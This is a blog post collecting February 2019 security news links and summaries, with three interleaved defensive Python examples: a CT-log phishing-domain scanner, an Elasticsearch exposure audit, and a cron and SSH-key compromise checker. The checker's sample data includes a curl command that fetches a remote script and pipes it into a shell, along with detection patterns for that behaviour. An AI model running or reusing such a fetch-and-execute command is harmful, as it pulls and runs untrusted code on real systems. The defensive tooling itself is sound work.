Cyber Security News February 2019

This posting is here to collect cyber security news in February 2019.

I post links to security vulnerability news to comments of this article.

If you are interested in cyber security trends, read my Cyber security trends 2019 posting.

You are also free to post related links.

 

373 Comments

  1. Tomi Engdahl says:

    Research
    ATM robber WinPot: a slot machine instead of cutlets
    https://securelist.com/atm-robber-winpot/89611/

    Reply
  2. Tomi Engdahl says:

    LPG Gas Company Leaked Details, Aadhaar Numbers of 6.7 Million Indian Customers
    https://thehackernews.com/2019/02/indane-aadhaar-leak.html

    Reply
  3. Tomi Engdahl says:

    Security
    Password managers may leave your online crown jewels ‘exposed in RAM’ to malware – but hey, they’re still better than the alternative
    The alternative being memorizing a load of really long unique passphrases
    https://www.theregister.co.uk/2019/02/20/password_managers_security_bugs/

    A bunch of infosec bods are taking some of the most popular password managers to task after an audit revealed some mildly annoying, non-world-ending security shortcomings.

    Researchers at ISE declared on Tuesday that the likes of 1Password, KeePass, LastPass, and Dashline all have vulnerabilities that would potentially allow malicious software on a Windows machine to steal either the master password or individual passwords stored by the applications.

    The problem here is mainly secure memory management. To some degree, every one of the four password managers left passwords – either the master password or individual credentials – accessible in memory.

    Password Managers: Under the Hood of Secrets Management
    https://www.securityevaluators.com/casestudies/password-manager-hacking/

    Reply
  4. Tomi Engdahl says:

    Why hackers love mainframe passwords – and what to do about it
    https://www.itproportal.com/features/why-hackers-love-mainframe-passwords-and-what-to-do-about-it/

    Why are IBM’s mainframe customers seemingly reluctant to upgrade their security by incorporating multi-factor authentication?

    Reply
  5. Tomi Engdahl says:

    A malicious USB cable with its own wifi rig
    https://boingboing.net/2019/02/19/o-mg.html

    MG has built a proof-of-concept malicious USB cable with a tiny wifi radio hidden inside of it, able to wirelessly exfiltrate stolen data; he calls it the O. MG, and while the prototype cost him $4k and took 300 hours, he’s working with a team on a small production run for other security researchers to play with.

    Reply
  6. Tomi Engdahl says:

    Private Mossad for Hire
    Inside an effort to influence American elections, starting with one small-town race.
    https://www.newyorker.com/magazine/2019/02/18/private-mossad-for-hire

    Reply
  7. Tomi Engdahl says:

    Black-hat sextortionists required: Competitive salary and dental plan
    Cybercrims aren’t just raking it in – they’re dishing it out too
    https://www.theregister.co.uk/2019/02/21/black_hats_sextortion_275k_salaries_helpers/

    Extortionists are promising salaries of more than a quarter of a million pounds to skilled infosec folk willing to put on a black hat, according to research outfit Digital Shadows.

    Reply
  8. Tomi Engdahl says:

    China Uses DNA to Track Its People, With the Help of American Expertise
    https://www.nytimes.com/2019/02/21/business/china-xinjiang-uighur-dna-thermo-fisher.html

    The Chinese authorities turned to a Massachusetts company and a prominent Yale researcher as they built an enormous system of surveillance and control.

    Reply
  9. Tomi Engdahl says:

    Fool ML once, shame on you. Fool ML twice, shame on… the AI dev? If you can hoodwink one model, you may be able to trick many more
    Some tips on how to avoid miscreants deceiving your code
    https://www.theregister.co.uk/2019/02/21/ai_attack_transfer/

    Adversarial attacks that trick one machine-learning model can potentially be used to fool other so-called artificially intelligent systems, according to a new study.

    It’s hoped the research will inform and persuade AI developers to make their smart software more robust against these transferable attacks, preventing malicious images, text, or audio that hoodwinks one trained model from tricking another similar model.

    Reply
  10. Tomi Engdahl says:

    Russia bans smartphones for soldiers over social media fears
    https://www.bbc.com/news/world-europe-47302938

    Russia’s parliament has voted to ban soldiers from using smartphones while on duty, after their social media use raised issues of national security.

    The bill forbids military personnel from using a phone with the ability to take pictures, record videos and access the internet.

    Soldiers also cannot write about the military or talk to journalists.

    Reply
  11. Tomi Engdahl says:

    Researcher: Not Hard for a Hacker to Capsize a Ship at Sea
    https://threatpost.com/hacker-capsize-ship-sea/142077/

    Capsizing a ship with a cyberattack is a relatively low-skill enterprise, according to an analysis from Pen Test Partners.

    With so many previously outlined ways to infiltrate networks on-board shipping vessels (think satcom hacking, phishing, USB attacks, insecure crew Wi-Fi, etc.), the question becomes, what could an adversary do with that access?

    “If one was suitably motivated, perhaps by a nation-state or a crime syndicate, one could bring about the sinking of a ship,” said Pen Test Partners researcher Ken Munro, in a stark assessment of maritime cyber-danger this week.

    Reply
  12. Tomi Engdahl says:

    Bored bloke takes control of British Army ‘psyops’ unit’s Twitter
    Great recruiting tool there, folks
    https://www.theregister.co.uk/2019/02/21/77_brigade_twitter_account_hacked/

    Reply
  13. Tomi Engdahl says:

    Drupal RCE Flaw Exploited in Attacks Days After Patch
    https://www.securityweek.com/drupal-rce-flaw-exploited-attacks-days-after-patch

    The flaw, tracked as CVE-2019-6340, is caused by the lack of proper data sanitization in some field types and it can allow an attacker to execute arbitrary PHP code. Exploitation is possible if the core RESTful Web Services module is enabled and it allows PATCH or POST requests. Attacks are also possible if another web services module is enabled, such as JSON:API in Drupal 8 or RESTful Web Services or Services in Drupal 7.

    Reply
  14. Tomi Engdahl says:

    China’s Telecom Dominance a Security Challenge: UK’s GCHQ
    https://www.securityweek.com/chinas-telecom-dominance-security-challenge-uks-gchq

    China’s global dominance in telecommunications networks could pose security threats for decades, Britain’s cybersecurity chief warned in a speech in Singapore on Monday.

    As countries move to roll out ultra-fast fifth-generation — 5G — mobile networks, concerns are mounting that Beijing could use hardware provided by Chinese firms to spy on Western governments.

    “The strategic challenge of China’s place in the era of globalised technology is much bigger than just one telecommunications equipment company… it’s a first order strategic challenge for us all,” the head of Britain’s GCHQ cybersecurity agency Jeremy Fleming said.

    “It’s a hugely complex strategic challenge which will span the next few decades… How we deal with it will be crucial for prosperity and security way beyond 5G contracts.”

    In the last year, the United States has stepped up pressure on its allies to block Chinese telecoms giant Huawei from building their 5G networks, citing security concerns.

    https://www.securityweek.com/us-urging-allies-shun-huawei-wsj

    Reply
  15. Tomi Engdahl says:

    Mozilla May Reject UAE Firm’s Root Inclusion Request
    https://www.securityweek.com/mozilla-may-reject-uae-firms-root-inclusion-request

    Mozilla is considering rejecting a request by United Arab Emirates-based DarkMatter to be accepted as a top-level certificate authority in Mozilla’s root certificate program.

    In December 2017, the UAE organization asked Mozilla to add its root to Mozilla products, and the request entered the review process soon after. DarkMatter is a subordinate certificate authority (CA) under QuoVadis, now part of DigiCert (which also acquired Symantec’s CA business).

    Reply
  16. Tomi Engdahl says:

    Support for FIDO2 Passwordless Authentication Added to Android
    https://www.securityweek.com/support-fido2-passwordless-authentication-added-android

    Google and FIDO Alliance on Monday announced that it is now easier for developers to provide passwordless authentication features for their Android websites and apps as a result of Android becoming FIDO2 Certified.

    The FIDO2 Project comprises the W3C’s Web Authentication (WebAuthn) specification, which provides a standard web API that enables online services to use FIDO authentication, and the Client-to-Authenticator Protocol (CTAP), which enables devices such as FIDO security keys and smartphones to serve as authenticators via WebAuthn.

    Now that Android has become FIDO2 Certified, it will be easier for developers to enable users to log into apps and websites using their Android device’s built-in fingerprint sensor and/or FIDO security keys.

    The FIDO2 certification has been granted to devices running Android 7 and later. New devices will be certified out of the box, while existing devices will include FIDO2 support after an automated Google Play Services update. Since a Google Play Services update is used to roll out FIDO2 support, users will not have to wait on their device’s manufacturer to benefit from passwordless authentication capabilities.

    The use of FIDO authentication, which can be implemented by developers via a simple API call, increases protection against phishing, man-in-the-middle (MitM) and other types of attacks.

    Reply
  17. Tomi Engdahl says:

    Hacker puts up for sale third round of hacked databases on the Dark Web
    https://www.zdnet.com/article/hacker-puts-up-for-sale-third-round-of-hacked-databases-on-the-dark-web/

    Hacker is selling 93 million user records from eight companies, including GfyCat.

    Reply
  18. Tomi Engdahl says:

    ICANN Calls for Full DNSSEC Deployment, Promotes Community Collaboration to Protect the Internet
    https://www.icann.org/news/announcement-2019-02-22-en

    The Internet Corporation for Assigned Names and Numbers (ICANN) believes that there is an ongoing and significant risk to key parts of the Domain Name System (DNS) infrastructure.

    In the context of increasing reports of malicious activity targeting the DNS infrastructure, ICANN is calling for full deployment of the Domain Name System Security Extensions (DNSSEC) across all unsecured domain names. The organization also reaffirms its commitment to engage in collaborative efforts to ensure the security, stability and resiliency of the Internet’s global identifier systems.

    Reply
  19. Tomi Engdahl says:

    B0r0nt0K Ransomware Wants $75,000 Ransom, Infects Linux Servers
    https://www.bleepingcomputer.com/news/security/b0r0nt0k-ransomware-wants-75-000-ransom-infects-linux-servers/

    A new ransomware called B0r0nt0K is encrypting victims’ web sites and demanding a 20 bitcoin, or approximately $75,000, ransom. This ransomware is known to infect Linux servers, but may also be able to encrypt users running Windows.

    When examining the source code for the payment site, BleepingComputer noticed the “Vietnamese Hacker” embedded comment. While this could indicate that the developer is Vietnamese, this is by no means proof.

    Reply
  20. Tomi Engdahl says:

    Zack Whittaker / TechCrunch:
    Cloudflare expands its government warrant canaries, claiming it’s never handed over its SSL keys or customers’ SSL keys, as many firms abandon their canaries — When the government comes for your data, tech companies can’t always tell you. But thanks to a legal loophole, companies can say if they haven’t had a visit yet

    Cloudflare expands its government warrant canaries
    https://techcrunch.com/2019/02/26/cloudflare-warrant-canary/

    Reply
  21. Tomi Engdahl says:

    Hackers can hijack bare-metal cloud servers by corrupting their BMC firmware
    https://www.zdnet.com/article/hackers-can-hijack-bare-metal-cloud-servers-by-corrupting-their-bmc-firmware/

    Cloud providers are failing to wipe bare-metal servers clean when re-assigning them to new clients.

    Reply
  22. Tomi Engdahl says:

    We Need More Phishing Sites on HTTPS!
    https://www.venafi.com/blog/we-need-more-phishing-sites-https?utm_source=socialmedia&utm_medium=Bora&utm_campaign=Helme-phishing-HTTPS-blog

    There, I said it! It might sound like a weird thing to say but stick with me on this one. We really do need more phishing sites on HTTPS, all of them, encrypt all the things, and not for the reason you might think.

    The web is going HTTPS

    If we want the whole web to be on HTTPS, which we do, then we need to remove the barriers to going HTTPS, mainly financial and technical barriers. Let’s Encrypt managed to do both of those things

    The HTTPS phishing thing

    There’s been a lot of noise in the industry recently about Let’s Encrypt issuing certs to domains being used for phishing.

    The CA needs to prove you own a domain and they issue a cert.

    Up until last year COMODO were issuing a lot more phishing certs than Let’s Encrypt

    Let’s Encrypt log all of their certs, where, right now, COMODO don’t. When we get to April and CT logging becomes mandatory and not optional as it is now

    If we want a 100% encrypted web then we need to encrypt all sites, despite whether or not you agree with what they do/say/sell/etc… 100% is 100% and it includes the ‘bad guys’ too.

    there is another reason we want phishing sites on HTTPS and it’s actually so we can find them and shut them down faster.

    Certificate Transparency

    any certificate that a CA issue has to be placed into a public log for the whole world to see. Just think about that for a second. Right now when someone registers a domain, we don’t know. When they setup a domain in DNS, we don’t know. When they go phishing on HTTP, we don’t know. But now, when they get a certificate, we’ve got them! The CT logs are an awesome way to monitor for new phishing sites coming into existence by watching for them issuing new certificates!

    Once it comes online, you can see it’s obviously a phishing site and you head over and submit it to SafeBrowsing. You can have it reported and blocked before the phishers have even had chance to send out their first round of emails.

    SafeBrowsing is already a proven and reliable method to neutralise phishing sites when they pop up. Finding phishing certs and then asking the CA to revoke them is also a fairly pointless exercise because revocation is broken and of course there’s the obvious possibility of abuse for such a system too.

    people seem generally quite happy for the domain registrar to sell the domain and for the DNS providers to resolve the domain and for the browsers to then render the domain, but if a CA issues a certificate for it then there’s uproar. Personally I don’t quite understand the focus on cert issuance for phishing domains and think there are far better places to focus our efforts

    Reply
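The post above argues that Certificate Transparency logs let defenders spot lookalike domains the moment a certificate is issued. The following is an added example, not code from the post or from Venafi, showing what that monitoring looks like in practice: it scans CT-style records (a constructed sample, not real log data) for names that impersonate a watched brand, folding punycode, accents and digit-for-letter swaps before matching. The brand "example" and the domain example.com are assumed to be the defender's own; the registrable-domain helper is a deliberate two-label approximation rather than a public-suffix lookup.

```python
import unicodedata

# Constructed sample of certificate-transparency-style records (not real log data).
# Each record mimics what a CT monitor extracts from a logged (pre)certificate:
# the subject alternative names and the issuing CA. The punycode entry is built
# from a Unicode name so the sample stays self-consistent.
SAMPLE_CT_ENTRIES = [
    {"issuer": "Let's Encrypt Authority X3", "sans": ["example.com", "www.example.com"]},
    {"issuer": "Let's Encrypt Authority X3", "sans": ["secure-examp1e-login.com"]},
    {"issuer": "COMODO RSA Domain Validation", "sans": ["mail.unrelated.org"]},
    {"issuer": "Let's Encrypt Authority X3", "sans": ["example.com.verify-account.net"]},
    {"issuer": "Let's Encrypt Authority X3",
     "sans": ["ex\u00e4mple.com".encode("idna").decode("ascii")]},
]

# Assumptions: "example" is the defender's own brand and example.com its legitimate domain.
WATCHED_BRANDS = ["example"]
OWN_DOMAINS = {"example.com"}

# Common digit/symbol-for-letter substitutions seen in lookalike names.
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t", "@": "a"})


def normalize_hostname(hostname):
    """Decode punycode, strip accents, fold homoglyph digits and lowercase."""
    try:
        hostname = hostname.encode("ascii").decode("idna")
    except UnicodeError:
        pass  # already Unicode or malformed punycode: normalize as-is
    decomposed = unicodedata.normalize("NFKD", hostname)
    stripped = "".join(c for c in decomposed if not unicodedata.combining(c))
    return stripped.lower().translate(HOMOGLYPHS)


def registrable_domain(hostname):
    """Crude last-two-label approximation; a real monitor would use the public suffix list."""
    labels = hostname.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else hostname.lower()


def suspicious_sans(entry, brands=WATCHED_BRANDS, own=OWN_DOMAINS):
    """Return (san, brand) pairs for names that impersonate a watched brand."""
    hits = []
    for san in entry["sans"]:
        if registrable_domain(san) in own:
            continue  # our own, legitimately issued names
        normalized = normalize_hostname(san)
        for brand in brands:
            if brand in normalized:
                hits.append((san, brand))
    return hits


def scan_ct_entries(entries):
    """Alerts a defender would review and, if confirmed, report (e.g. to Safe Browsing)."""
    alerts = []
    for entry in entries:
        for san, brand in suspicious_sans(entry):
            alerts.append({"san": san, "brand": brand, "issuer": entry["issuer"]})
    return alerts


if __name__ == "__main__":
    for alert in scan_ct_entries(SAMPLE_CT_ENTRIES):
        print(f"lookalike of '{alert['brand']}': {alert['san']} (issued by {alert['issuer']})")
```

On the sample the scan flags three names: the digit-swapped one, the one using the brand as a subdomain of an unrelated registrable domain, and the punycode one. Because the match runs after normalization, the same rule catches all three without a separate pattern for each trick; the price is false positives on legitimate third parties that mention the brand, which is why the output is framed as a review queue rather than an automatic block.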
  23. Tomi Engdahl says:

    Russian Bears Need Less Than 20 Minutes To Hack Your Data
    https://www.forbes.com/sites/daveywinder/2019/02/19/how-the-speed-of-russian-bears-can-help-your-business-understand-the-1-10-60-rule/#44815f9d7131

    Russian bears lead the way when it comes to gaining enough of a foothold in your networks to perform a successful data breach according to the 2019 Global Threat Report from CrowdStrike. This matters, because having an understanding of how quickly the bad guys can move across your networks is vital in getting to grips with the 1-10-60 rule. And that determines how likely you are to stop them succeeding in breaching your data

    Reply
  24. Tomi Engdahl says:

    Close Enough
    https://slate.com/technology/2019/02/reverse-location-search-warrants-google-police.html

    Police departments are using “reverse location search warrants” to force Google to hand over data on anyone near a crime scene.

    Reply
  25. Tomi Engdahl says:

    Who needs malware? IBM says most hackers just PowerShell through boxes now, leaving little in the way of footprints
    https://www.theregister.co.uk/2019/02/26/malware_ibm_powershell/

    Direct-to-memory attacks now account for 57 per cent of hacks, apparently

    A company’s internal network, once compromised, is now more likely to be ransacked by automated scripts than a piece of malware.

    Reply
  26. Tomi Engdahl says:

    The Feds’ Favorite iPhone Hacking Tool Is Selling On eBay For $100—And It’s Leaking Data
    https://www.forbes.com/sites/thomasbrewster/2019/02/27/the-feds-favorite-iphone-hacking-tool-is-selling-on-ebay-for-100and-its-leaking-data/#745e64185dd4

    When eBay merchant Mr. Balaj was looking through a pile of hi-fi junk at an auction in the U.K., he came across an odd-looking device. Easily mistaken for a child’s tablet, it had the word “Cellebrite” written on it. To Mr. Balaj, it appeared to be a worthless piece of electronic flotsam, so he left it in his garage to gather dust for eight months.

    But recently he’s learned just what he had his hands on: a valuable, Israeli-made piece of technology called the Cellebrite UFED. It’s used by police around the world to break open iPhones, Androids and other modern mobiles to extract data.

    Reply
  27. Tomi Engdahl says:

    Network Tallahassee Internet provider hacked, pays ransom to get back online
    https://eu.tallahassee.com/story/news/money/2019/02/26/network-tallahassee-internet-provided-hacked-pays-ransom-get-back-online/2991190002/

    Hackers attacked a Tallahassee-based broadband provider and demanded $6,000 ransom to get its operations back online.

    Reply
  28. Tomi Engdahl says:

    Dow Jones’ watchlist of 2.4 million high-risk individuals has leaked
    https://techcrunch.com/2019/02/27/dow-jones-watchlist-leak/

    A watchlist of risky individuals and corporate entities owned by Dow Jones has been exposed, after a company with access to the database left it on a server without a password.

    Bob Diachenko, an independent security researcher, found the Amazon Web Services-hosted Elasticsearch database exposing more than 2.4 million records of individuals or business entities.

    Reply
  29. Tomi Engdahl says:

    It seems that the watchlist of risky individuals and corporate entities owned by Dow Jones has been exposed, after a company with access to the database left it on a server without a password.

    Dow Jones Risk Screening Watchlist Exposed Publicly
    https://securitydiscovery.com/dow-jones-risk-screening-watchlist-exposed-publicly/

    “copy of the Dow Jones Watchlist dataset, sitting on a public Elasticsearch cluster 4.4GB in size and available for public access to anyone who knew where to look (hint: any public IoT search engine, such as BinaryEdge).”

    Dow Jones’ watchlist of 2.4 million high-risk individuals has leaked
    https://techcrunch.com/2019/02/27/dow-jones-watchlist-leak/

    Unsecured databases accidentally made publicly accessible seem to be becoming a business failure trend for 2019.

    Reply
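Both reports above describe the same failure: an Elasticsearch cluster bound to a public interface with nothing in front of it. As an added example (not code from Dow Jones, Security Discovery or TechCrunch), here is a small audit that reads elasticsearch.yml-style settings and flags that condition, with a constructed weak configuration beside a hardened one. It assumes X-Pack security is the authentication layer in use; a deployment that puts auth in a reverse proxy instead would need that check adapted.

```python
import ipaddress

# Constructed elasticsearch.yml fragments (not the configuration from either report).
# The weak one is the shape of deployment that ends up in an IoT search engine:
# bound to every interface, no authentication layer in front of port 9200.
WEAK_CONFIG = """\
cluster.name: watchlist-cluster
network.host: 0.0.0.0
http.port: 9200
"""

# Hardened: bound to a private address only, with the X-Pack security layer
# turned on (assumption: X-Pack security is the auth mechanism in use here).
HARDENED_CONFIG = """\
cluster.name: watchlist-cluster
network.host: 10.0.12.7
http.port: 9200
xpack.security.enabled: true
"""

ANY_INTERFACE = {"0.0.0.0", "::", "_global_"}  # Elasticsearch bind values meaning "everything"


def parse_flat_yaml(text):
    """Minimal parser for the flat key: value lines elasticsearch.yml uses."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        key, value = line.split(":", 1)
        settings[key.strip()] = value.strip().strip("'\"")
    return settings


def bound_to_public(host):
    """True when the node listens on every interface or on a globally routable address."""
    if host in ANY_INTERFACE:
        return True
    try:
        return ipaddress.ip_address(host).is_global
    except ValueError:
        return False  # other special values or hostnames: not judged here


def bound_beyond_loopback(host):
    """True unless the node is confined to the local machine."""
    if host == "_local_":
        return False
    try:
        return not ipaddress.ip_address(host).is_loopback
    except ValueError:
        return True


def audit_elasticsearch(config_text):
    """Return a list of findings; an empty list means both checks passed."""
    settings = parse_flat_yaml(config_text)
    host = settings.get("network.host", "_local_")  # Elasticsearch default: loopback only
    security_on = settings.get("xpack.security.enabled", "false").lower() == "true"
    findings = []
    if bound_to_public(host):
        findings.append(f"network.host={host}: HTTP API reachable from any network")
    if bound_beyond_loopback(host) and not security_on:
        findings.append("reachable beyond loopback with xpack.security.enabled missing or false")
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_elasticsearch(cfg) or "no findings")
```

The weak fragment yields two findings and the hardened one none. Binding to a private address alone is not enough: the second check still fires when anything other than loopback is reachable without authentication, which is the case the leaked watchlist illustrates.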
  30. Tomi Engdahl says:

    Operator of eight DDoS-for-hire services pleads guilty
    https://www.zdnet.com/article/operator-of-eight-ddos-for-hire-services-pleads-guilty/

    Investigators tracked him down after he logged into his rented servers using his home IP addresses.

    Reply
  31. Tomi Engdahl says:

    Google Chrome zero-day used in the wild to collect user data via PDF files
    https://www.zdnet.com/article/google-chrome-zero-day-used-in-the-wild-to-collect-user-data-via-pdf-files/

    Updated: Google is preparing a patch for late April 2019. Some of the suspicious PDF files exploiting this bug don’t appear to be malicious in nature.

    Reply
  32. Tomi Engdahl says:

    Intel SGX Card expands SGX security protections to cloud data centers
    Intel announces new Intel SGX Card line.
    https://www.zdnet.com/article/intel-sgx-card-expands-sgx-security-protections-to-cloud-data-centers/

    Intel announced today Intel SGX Card, a new product to expand its SGX security feature to existing data center server infrastructure that wouldn’t have been able to benefit from it due to hardware architectural limitations.

    Intel SGX stands for Software Guard eXtensions, a feature found in modern Intel CPUs that allows developers to isolate parts of applications inside secure “enclaves.”

    Reply
  33. Tomi Engdahl says:

    Targeted malware attacks against Elasticsearch servers surge
    Old vulnerabilities are proving to be successful.
    https://www.zdnet.com/article/targeted-malware-attacks-against-elasticsearch-clusters-surge/

    Unsecured Elasticsearch clusters are being targeted in a fresh wave of attacks designed to drop both malware and cryptocurrency mining software.

    This week, cybersecurity researchers from Cisco Talos warned of a spike in recent strikes against these systems, with six separate cyberattack groups believed to be involved.

    “The bash script utilized by the attacker follows a commonly observed pattern of disabling security protections and killing a variety of other malicious processes (primarily other mining malware), before placing its RSA key in the authorized_keys file,” the researchers say. “Additionally, this bash script serves to download illicit miners and their configuration files. The script achieves persistence by installing shell scripts as cron jobs.”

    Reply
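The Talos description quoted above gives two host artifacts worth checking on any Elasticsearch box: an added entry in authorized_keys and cron jobs that fetch and run scripts. As an added example (not Talos code and not tied to any specific campaign), the checker below diffs an authorized_keys file against a baseline of known key blobs and flags crontab lines that download from the network, pipe into a shell or execute from a world-writable directory. The key blobs, the documentation-range IP address and the file contents are all constructed sample data.

```python
import re

# Constructed sample artifacts (not from a real compromised host).
AUTHORIZED_KEYS = """\
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0admin0 admin@bastion
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1unknown1 root@localhost
"""

CRONTAB = """\
0 2 * * * /usr/local/bin/backup.sh
*/15 * * * * curl -fsSL http://198.51.100.23/x.sh | sh
@reboot /tmp/.X11-unix/.kswapd
"""

# Key blobs the operations team knows it deployed (constructed baseline).
BASELINE_KEY_BLOBS = {"AAAAB3NzaC1yc2EAAAADAQABAAABAQC0admin0"}

REMOTE_FETCH = re.compile(r"\b(curl|wget)\b.*\b(https?|ftp)://")
PIPE_TO_SHELL = re.compile(r"\|\s*(ba|da|z)?sh\b")
WORLD_WRITABLE = ("/tmp/", "/dev/shm/", "/var/tmp/")


def unexpected_keys(authorized_keys_text, baseline):
    """Return the comment (or blob prefix) of every key not in the baseline."""
    found = []
    for line in authorized_keys_text.splitlines():
        parts = line.split()
        if len(parts) < 2 or not parts[0].startswith(("ssh-", "ecdsa-")):
            continue  # blank, comment or option-prefixed line: skipped in this simple checker
        key_type, blob = parts[0], parts[1]
        if blob not in baseline:
            found.append(parts[2] if len(parts) > 2 else f"{key_type} {blob[:12]}...")
    return found


def suspicious_cron(crontab_text):
    """Return (line, reasons) pairs for cron entries matching miner-dropper habits."""
    hits = []
    for line in crontab_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        reasons = []
        if REMOTE_FETCH.search(line):
            reasons.append("downloads from the network")
        if PIPE_TO_SHELL.search(line):
            reasons.append("pipes into a shell")
        if any(path in line for path in WORLD_WRITABLE):
            reasons.append("runs from a world-writable directory")
        if reasons:
            hits.append((line, reasons))
    return hits


if __name__ == "__main__":
    for owner in unexpected_keys(AUTHORIZED_KEYS, BASELINE_KEY_BLOBS):
        print("unexpected authorized key:", owner)
    for line, reasons in suspicious_cron(CRONTAB):
        print("suspicious cron entry:", line, "->", ", ".join(reasons))
```

On the sample the key check reports the root@localhost key and the cron check reports two of the three entries, the nightly backup passing clean. Comparing blobs rather than comments is deliberate: the comment field is free text and is the first thing an intruder would set to something plausible.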
  34. Tomi Engdahl says:

    New Attack Runs Code After Closing Browser Tab
    https://www.securityweek.com/new-attack-runs-code-after-closing-browser-tab

    A group of researchers has discovered that websites can abuse modern browser APIs to persistently abuse browser resources for nefarious operations even after their tabs or windows have been closed.

    In a paper (PDF) detailing the attack, the researchers explain that MarioNet relies solely on already available HTML5 APIs and that it does not require the installation of additional software. This also means that it can be used on all major browsers.

    The attack is both persistent and stealthy, as it continues in the background of the browser even after the user closes the window or tab of the malicious website. However, it cannot survive browser reboots.

    https://www.ndss-symposium.org/wp-content/uploads/2019/02/ndss2019_01B-2_Papadopoulos_paper.pdf

    Reply
  35. Tomi Engdahl says:

    NVIDIA Patches High Risk Vulnerabilities in GPU Display Drivers
    https://www.securityweek.com/nvidia-patches-high-risk-vulnerabilities-gpu-display-drivers

    NVIDIA has released a security update for the NVIDIA GPU display driver, to address several High severity vulnerabilities impacting GeForce, Quadro, NVS, and Tesla products.

    Reply
  36. Tomi Engdahl says:

    New Attacks Show Signed PDF Documents Cannot Be Trusted
    https://www.securityweek.com/new-attacks-show-signed-pdf-documents-cannot-be-trusted

    Many popular PDF viewers and online validation services contain vulnerabilities that can be exploited to make unauthorized changes to signed PDF documents without invalidating their signature, researchers have warned.

    Reply
  37. Tomi Engdahl says:

    Russia’s Ex-Cybersecurity Chief Gets 22-Year Sentence in Jail
    https://www.securityweek.com/russias-ex-cybersecurity-chief-gets-22-year-sentence-jail

    A Russian military court convicted a former senior counterintelligence officer and a cybersecurity firm executive of treason Tuesday, concluding a case that initially aroused speculation of a manufactured effort to punish the source of leaks about Russian campaign hacking.

    Moscow’s District Military Court heard several months of evidence and arguments behind closed doors before it found Col. Sergei Mikhailov, an ex-officer at Russia’s Federal Security Service (FSB), and Kaspersky Lab executive Ruslan Stoyanov guilty.

    The basis for the charges remains murky given the top-secret nature of the criminal proceedings.

    Reply
